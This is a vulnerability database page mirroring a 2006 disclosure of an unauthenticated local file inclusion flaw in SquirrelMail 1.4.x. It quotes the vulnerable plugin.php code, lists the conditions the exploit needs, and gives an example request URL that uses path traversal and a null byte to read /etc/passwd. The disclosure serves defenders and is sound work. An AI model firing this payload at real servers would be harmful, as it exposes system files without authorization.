Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12940
HistoryJun 02, 2006 - 12:00 a.m.

Squirrelmail local file inclusion

2006-06-0200:00:00
vulners.com
1717
JSON

Squirrelmail local file inclusion bug in functions/plugin.php .
Tested on the latest 1.4.x version.
No authentication needed.

if (isset($plugins) && is_array($plugins)) {
foreach ($plugins as $name) {
use_plugin($name);
}

function use_plugin ($name) {
if (file_exists(SM_PATH . "plugins/$name/setup.php")) {
include_once(SM_PATH . "plugins/$name/setup.php");
$function = "squirrelmail_plugin_init_$name";
if (function_exists($function)) {
$function();
}
}
}

If register_globals is on we can control the $name variable.

In order to avoid errors SM_PATH needs to be defined. Exploitation
is done through src/redirect.php ( it includes functions/plugin.php
prior to authentication and it defines SM_PATH ).

magic_quotes_gpc needs to be off.

Example:
http://[host]/[squirrelmail dir]/src/redirect.php?plugins[]=…/…/…/…/etc/passwd%00

Denix Solutions
Unix/Linux Solutions for your Business
http://www.denixsolutions.com

JSON